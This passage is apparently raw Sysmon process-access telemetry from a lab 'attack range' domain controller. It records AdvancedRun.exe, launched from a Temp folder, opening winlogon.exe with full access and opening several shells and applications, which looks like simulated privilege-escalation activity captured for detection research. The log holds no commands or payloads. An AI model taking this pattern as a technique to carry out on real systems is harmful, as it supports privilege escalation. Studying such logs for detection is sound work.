10341000x80000000000000004057132Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.244{834264DD-DAE7-61EA-1700-000000002702}13003992C:\Windows\System32\svchost.exe{834264DD-0FD9-61EB-D507-000000002702}2164C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x14c0C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\seclogon.dll+128d|c:\windows\system32\seclogon.dll+10ac|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator 10341000x80000000000000004057131Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21f3|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21bd|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057130Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057129Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057128Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057127Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057126Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.243{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057125Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.242{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057124Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.242{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057123Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.241{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057122Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.241{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057121Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.241{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004057120Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.241{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057119Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.240{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057118Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.240{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057117Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.240{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057116Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 19:56:09.240{834264DD-0FD9-61EB-D507-000000002702}21645652C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004057115Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 